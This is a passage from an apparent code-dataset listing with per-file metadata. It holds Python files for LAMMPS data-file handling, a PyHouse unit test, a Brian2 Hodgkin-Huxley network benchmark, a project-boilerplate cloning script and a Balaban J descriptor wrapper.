f.close()
self.headers = headers
self.sections = sections
# --------------------------------------------------------------------
# assign names to atom columns
def map(self,*pairs):
if len(pairs) % 2 != 0:
raise StandardError, "data map() requires pairs of mappings"
for i in range(0,len(pairs),2):
j = i + 1
self.names[pairs[j]] = pairs[i]-1
# --------------------------------------------------------------------
# extract info from data file fields
def get(self,*list):
if len(list) == 1:
field = list[0]
array = []
lines = self.sections[field]
for line in lines:
words = line.split()
values = map(float,words)
array.append(values)
return array
elif len(list) == 2:
field = list[0]
n = list[1] - 1
vec = []
lines = self.sections[field]
for line in lines:
words = line.split()
vec.append(float(words[n]))
return vec
else:
raise StandardError, "invalid arguments for data.get()"
# --------------------------------------------------------------------
# reorder columns in a data file field
def reorder(self,name,*order):
n = len(order)
natoms = len(self.sections[name])
oldlines = self.sections[name]
newlines = natoms*[""]
for index in order:
for i in xrange(len(newlines)):
words = oldlines[i].split()
newlines[i] += words[index-1] + " "
for i in xrange(len(newlines)):
newlines[i] += "\n"
self.sections[name] = newlines
# --------------------------------------------------------------------
# replace a column of named section with vector of values
def replace(self,name,icol,vector):
lines = self.sections[name]
newlines = []
j = icol - 1
for i in xrange(len(lines)):
line = lines[i]
words = line.split()
words[j] = str(vector[i])
newline = ' '.join(words) + '\n'
newlines.append(newline)
self.sections[name] = newlines
# --------------------------------------------------------------------
# replace x,y,z in Atoms with x,y,z values from snapshot ntime of dump object
# assumes id,x,y,z are defined in both data and dump files
# also replaces ix,iy,iz if they are defined
def newxyz(self,dm,ntime):
nsnap = dm.findtime(ntime)
dm.sort(ntime)
x,y,z = dm.vecs(ntime,"x","y","z")
self.replace("Atoms",self.names['x']+1,x)
self.replace("Atoms",self.names['y']+1,y)
self.replace("Atoms",self.names['z']+1,z)
if dm.names.has_key("ix") and self.names.has_key("ix"):
ix,iy,iz = dm.vecs(ntime,"ix","iy","iz")
self.replace("Atoms",self.names['ix']+1,ix)
self.replace("Atoms",self.names['iy']+1,iy)
self.replace("Atoms",self.names['iz']+1,iz)
# --------------------------------------------------------------------
# delete header value or section from data file
def delete(self,keyword):
if self.headers.has_key(keyword): del self.headers[keyword]
elif self.sections.has_key(keyword): del self.sections[keyword]
else: raise StandardError, "keyword not found in data object"
# --------------------------------------------------------------------
# write out a LAMMPS data file
def write(self,file):
f = open(file,"w")
print >>f,self.title
for keyword in hkeywords:
if self.headers.has_key(keyword):
if keyword == "xlo xhi" or keyword == "ylo yhi" or \
keyword == "zlo zhi":
pair = self.headers[keyword]
print >>f,pair[0],pair[1],keyword
elif keyword == "xy xz yz":
triple = self.headers[keyword]
print >>f,triple[0],triple[1],triple[2],keyword
else:
print >>f,self.headers[keyword],keyword
for pair in skeywords:
keyword = pair[0]
if self.sections.has_key(keyword):
print >>f,"\n%s\n" % keyword
for line in self.sections[keyword]:
print >>f,line,
f.close()
# --------------------------------------------------------------------
# iterator called from other tools
def iterator(self,flag):
if flag == 0: return 0,0,1
return 0,0,-1
# --------------------------------------------------------------------
# time query from other tools
def findtime(self,n):
if n == 0: return 0
raise StandardError, "no step %d exists" % (n)
# --------------------------------------------------------------------
# return list of atoms and bonds to viz for data object
def viz(self,isnap):
if isnap: raise StandardError, "cannot call data.viz() with isnap != 0"
id = self.names["id"]
type = self.names["type"]
x = self.names["x"]
y = self.names["y"]
z = self.names["z"]
xlohi = self.headers["xlo xhi"]
ylohi = self.headers["ylo yhi"]
zlohi = self.headers["zlo zhi"]
box = [xlohi[0],ylohi[0],zlohi[0],xlohi[1],ylohi[1],zlohi[1]]
# create atom list needed by viz from id,type,x,y,z
atoms = []
atomlines = self.sections["Atoms"]
for line in atomlines:
words = line.split()
atoms.append([int(words[id]),int(words[type]),
float(words[x]),float(words[y]),float(words[z])])
# create list of current bond coords from list of bonds
# assumes atoms are sorted so can lookup up the 2 atoms in each bond
bonds = []
if self.sections.has_key("Bonds"):
bondlines = self.sections["Bonds"]
for line in bondlines:
words = line.split()
bid,btype = int(words[0]),int(words[1])
atom1,atom2 = int(words[2]),int(words[3])
atom1words = atomlines[atom1-1].split()
atom2words = atomlines[atom2-1].split()
bonds.append([bid,btype,
float(atom1words[x]),float(atom1words[y]),
float(atom1words[z]),
float(atom2words[x]),float(atom2words[y]),
float(atom2words[z]),
float(atom1words[type]),float(atom2words[type])])
tris = []
lines = []
return 0,box,atoms,bonds,tris,lines
# --------------------------------------------------------------------
# return box size
def maxbox(self):
xlohi = self.headers["xlo xhi"]
ylohi = self.headers["ylo yhi"]
zlohi = self.headers["zlo zhi"]
return [xlohi[0],ylohi[0],zlohi[0],xlohi[1],ylohi[1],zlohi[1]]
# --------------------------------------------------------------------
# return number of atom types
def maxtype(self):
return self.headers["atom types"]
# --------------------------------------------------------------------
# data file keywords, both header and main sections
hkeywords = ["atoms","ellipsoids","lines","triangles","bodies",
"bonds","angles","dihedrals","impropers",
"atom types","bond types","angle types","dihedral types",
"improper types","xlo xhi","ylo yhi","zlo zhi","xy xz yz"]
skeywords = [["Masses","atom types"],
["Atoms","atoms"],["Ellipsoids","ellipsoids"],
["Lines","lines"],["Triangles","triangles"],["Bodies","bodies"],
["Bonds","bonds"],
["Angles","angles"],["Dihedrals","dihedrals"],
["Impropers","impropers"],["Velocities","atoms"],
["Pair Coeffs","atom types"],
["Bond Coeffs","bond types"],["Angle Coeffs","angle types"],
["Dihedral Coeffs","dihedral types"],
["Improper Coeffs","improper types"],
["BondBond Coeffs","angle types"],
["BondAngle Coeffs","angle types"],
["MiddleBondTorsion Coeffs","dihedral types"],
["EndBondTorsion Coeffs","dihedral types"],
["AngleTorsion Coeffs","dihedral types"],
["AngleAngleTorsion Coeffs","dihedral types"],
["BondBond13 Coeffs","dihedral types"],
["AngleAngle Coeffs","improper types"],
["Molecules","atoms"]]
| eddiejessup/pizza | src/data.py | Python | gpl-2.0 | 12,483 | [
"LAMMPS"
] | f48dd58365b09edef1a3b80e3cf02489368804009fd03f70defbb151b5b6f17d |
"""
@name: Modules/Core/Utilities/_test/test_coordinate_tools.py
@author: D. Brian Kimmel
@contact: d.briankimmel@gmail.com
@copyright: 2016-2019 by D. Brian Kimmel
@date: Created on Jun 21, 2016
@licencse: MIT License
@summary:
Passed all 5 tests - DBK 2016-11-22
"""
__updated__ = '2019-09-07'
# Import system type stuff
import xml.etree.ElementTree as ET
from twisted.trial import unittest
# Import PyMh files
from _test.testing_mixin import SetupPyHouseObj
from Modules.Core.Utilities.coordinate_tools import Coords
from Modules.Core.Utilities.debug_tools import PrettyFormatAny
class SetupMixin(object):
def setUp(self):
self.m_pyhouse_obj = SetupPyHouseObj().BuildPyHouseObj()
self.m_api = Coords
class A0(unittest.TestCase):
def test_00_Print(self):
_x = PrettyFormatAny.form('_test', 'title', 190) # so it is defined when printing is cleaned up.
print('Id: test_coordinate_tools')
class B1_Coords(SetupMixin, unittest.TestCase):
def setUp(self):
SetupMixin.setUp(self)
def test_01_Corner(self):
"""
"""
# print(PrettyFormatAny.form(JSON, 'B1-01 A - Corner'))
# print(PrettyFormatAny.form(JSON['Corner'], 'B1-01 B - Corner'))
l_ret = self.m_api._get_coords(JSON['Corner'])
# print(PrettyFormatAny.form(l_ret, 'B1-01 C - Corner'))
self.assertEqual(str(l_ret.X_Easting), TESTING_ROOM_CORNER_X_3)
self.assertEqual(str(l_ret.Y_Northing), TESTING_ROOM_CORNER_Y_3)
self.assertEqual(str(l_ret.Z_Height), TESTING_ROOM_CORNER_Z_3)
def test_2_Size(self):
"""
"""
l_ret = self.m_api._get_coords(JSON['Size'])
# print(PrettyFormatAny.form(l_ret, 'B1-02-A - Size'))
self.assertEqual(str(l_ret.X_Easting), TESTING_ROOM_SIZE_X_3)
self.assertEqual(str(l_ret.Y_Northing), TESTING_ROOM_SIZE_Y_3)
self.assertEqual(str(l_ret.Z_Height), TESTING_ROOM_SIZE_Z_3)
# ## END DBK
| DBrianKimmel/PyHouse | Project/src/Modules/Core/Utilities/_test/test_coordinate_tools.py | Python | mit | 1,987 | [
"Brian"
] | a34f575f3da7907305262bf5fb8af7cf744ff17fe648f3e3ac2c2ccdfa2b1961 |
"""
# Notes:
- This simulation seeks to emulate the COBAHH benchmark simulations of (Brette
et al. 2007) using the Brian2 simulator for speed benchmark comparison to
DynaSim. However, this simulation includes CLOCK-DRIVEN synapses, for direct
comparison to DynaSim's clock-driven architecture. The synaptic connections
are "low-density", with only a 2% probability of connection.
- The time taken to simulate will be indicated in the stdout log file
'~/batchdirs/brian_benchmark_COBAHH_clocksyn_lodens_4/pbsout/brian_benchmark_COBAHH_clocksyn_lodens_4.out'
- Note that this code has been slightly modified from the original (Brette et
al. 2007) benchmarking code, available here on ModelDB:
https://senselab.med.yale.edu/modeldb/showModel.cshtml?model=83319 in order
to work with version 2 of the Brian simulator (aka Brian2), and also modified
to change the model being benchmarked, etc.
# References:
- Brette R, Rudolph M, Carnevale T, Hines M, Beeman D, Bower JM, et al.
Simulation of networks of spiking neurons: A review of tools and strategies.
Journal of Computational Neuroscience 2007;23:349–98.
doi:10.1007/s10827-007-0038-6.
- Goodman D, Brette R. Brian: a simulator for spiking neural networks in Python.
Frontiers in Neuroinformatics 2008;2. doi:10.3389/neuro.11.005.2008.
"""
from brian2 import *
# Parameters
cells = 4
defaultclock.dt = 0.01*ms
area = 20000*umetre**2
Cm = (1*ufarad*cmetre**-2) * area
gl = (5e-5*siemens*cmetre**-2) * area
El = -60*mV
EK = -90*mV
ENa = 50*mV
g_na = (100*msiemens*cmetre**-2) * area
g_kd = (30*msiemens*cmetre**-2) * area
VT = -63*mV
# Synaptic strengths
gAMPA = (0.1*msiemens*cmetre**-2)* area
gGABAA = (0.06*msiemens*cmetre**-2)* area
# Synaptic time constants
tauAMPA = 2
tauGABAA = 5
# Synaptic reversal potentials
EAMPA = 1*mV
EGABAA = -80*mV
# The model
eqs = Equations('''
dv/dt = (gl*(El-v)-
gAMPA/cells*sAMPAtotal*(v-EAMPA)-
gGABAA/cells*sGABAAtotal*(v-EGABAA)-
g_na*(m*m*m)*h*(v-ENa)-
g_kd*(n*n*n*n)*(v-EK))/Cm : volt
dm/dt = alpha_m*(1-m)-beta_m*m : 1
dn/dt = alpha_n*(1-n)-beta_n*n : 1
dh/dt = alpha_h*(1-h)-beta_h*h : 1
alpha_m = 0.32*(mV**-1)*(13*mV-v+VT)/
(exp((13*mV-v+VT)/(4*mV))-1.)/ms : Hz
beta_m = 0.28*(mV**-1)*(v-VT-40*mV)/
(exp((v-VT-40*mV)/(5*mV))-1)/ms : Hz
alpha_h = 0.128*exp((17*mV-v+VT)/(18*mV))/ms : Hz
beta_h = 4./(1+exp((40*mV-v+VT)/(5*mV)))/ms : Hz
alpha_n = 0.032*(mV**-1)*(15*mV-v+VT)/
(exp((15*mV-v+VT)/(5*mV))-1.)/ms : Hz
beta_n = .5*exp((10*mV-v+VT)/(40*mV))/ms : Hz
sAMPAtotal : 1
sGABAAtotal : 1
''')
# Construct intrinsic cells
P = NeuronGroup(cells, model=eqs, method='euler')
proportion=int(0.8*cells)
Pe = P[:proportion]
Pi = P[proportion:]
# Contruct synaptic network
sAMPA=Synapses(Pe,P,
model='''ds/dt=1000.*5.*(1 + tanh(v_pre/(4.*mV)))*(1-s)/ms - (s)/(2*ms) : 1 (clock-driven)
sAMPAtotal_post = s : 1 (summed)
''')
sAMPA.connect(p=0.02)
sGABAA_RETC=Synapses(Pi,P,
model='''ds/dt=1000.*2.*(1 + tanh(v_pre/(4.*mV)))*(1-s)/ms - s/(5*ms) : 1 (clock-driven)
sGABAAtotal_post = s : 1 (summed)
''')
sGABAA_RETC.connect(p=0.02)
# Initialization
P.v = 'El + (randn() * 5 - 5)*mV'
# Record a few traces
trace = StateMonitor(P, 'v', record=[1, 10, 100])
totaldata = StateMonitor(P, 'v', record=True)
run(0.5 * second, report='text')
# # If you want to plot:
# plot(trace.t/ms, trace[1].v/mV)
# plot(trace.t/ms, trace[10].v/mV)
# plot(trace.t/ms, trace[100].v/mV)
# xlabel('t (ms)')
# ylabel('v (mV)')
# show()
# # If you want to save data:
# print("Saving TC cell voltages!")
# numpy.savetxt("foo_totaldata.csv", totaldata.v/mV, delimiter=",")
| asoplata/dynasim-benchmark-brette-2007 | output/Brian2/brian2_benchmark_COBAHH_clocksyn_lodens_0004/brian2_benchmark_COBAHH_clocksyn_lodens_0004.py | Python | gpl-3.0 | 3,772 | [
"Brian"
] | 0e60a10162104b807e8efc284dd5f1ae1d6c8ebf566ea5504c8484f879d47057 |
#!/usr/bin/env python
from subprocess import call
import shutil
import simplejson
from collections import OrderedDict
import os
from GitBoil import Boil
### TODO
# make README.md blank
# update key words
# https://github.com/jamesrhaley/es2015-babel-gulp-jasmine.git
new_name = raw_input("what should the project be called now: ")
if not os.path.isdir(new_name):
######## ------ gather info and download files ------ ############
# get all of the needed info to down load the file and update it
url = raw_input("what github url should we clone: ")
Boil.git_clone(url, new_name)
author = raw_input("new author: ")
description = raw_input("new description: ")
version = raw_input("version?(1.0.0): ")
licence = raw_input("licence?(MIT): ")
######## ------ edit package.json ------- ###########
# package.json path
pack_path = new_name + '/package.json'
# overkill but I was having issues. The following steps load and clean up
# the package.json string before loading it into simplejson
json_file = open(pack_path, 'r+')
f = json_file.read()
g = f.split('\n')
for i, item in enumerate(g):
print item
print item.strip()
g[i] = item.strip()
together = ''.join(g)
# load json into as an OrderedDict to retain original order
data = simplejson.loads(together, object_pairs_hook=OrderedDict)
# update feilds. Need to update keywords
data["name"] = new_name
data["author"] = author
data["description"] = description
# convert OrderedDict into a json string
outfile = simplejson.dumps(data, indent=4)
# remove old package.json and create/write a new one
os.remove(pack_path)
new_pack = open(pack_path, 'w')
new_pack.write(outfile)
new_pack.close()
Boil.remove_licence(new_name)
Boil.clean_readme(new_name)
else:
string = '\nThat directory already exits!!\nPlease come up with a new name.\n'
print(string)
| jamesrhaley/boilJS | boil_JS.py | Python | mit | 1,987 | [
"GULP"
] | 18467e4bb4ca661a10e125dc9dea12db1d06426080aedf1c27adc81a1b68b315 |
import rdkit.Chem.GraphDescriptors as RDKit
from ._base import Descriptor
from ._graph_matrix import DistanceMatrix
__all__ = ("BalabanJ",)
class BalabanJ(Descriptor):
r"""Balaban's J index descriptor(rdkit wrapper)."""
since = "1.0.0"
__slots__ = ()
def description(self):
return "Balaban's J index"
explicit_hydrogens = False
@classmethod
def preset(cls, version):
yield cls()
def parameters(self):
return ()
def __str__(self):
return self.__class__.__name__
def dependencies(self):
return {"D": DistanceMatrix(self.explicit_hydrogens)}
def calculate(self, D):
return float(RDKit.BalabanJ(self.mol, dMat=D))
rtype = float
| mordred-descriptor/mordred | mordred/BalabanJ.py | Python | bsd-3-clause | 733 | [
"RDKit"
] | ab2f287bbdb154553547cbf770b682b1367078e250b22e082ada5d7577ba906d |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.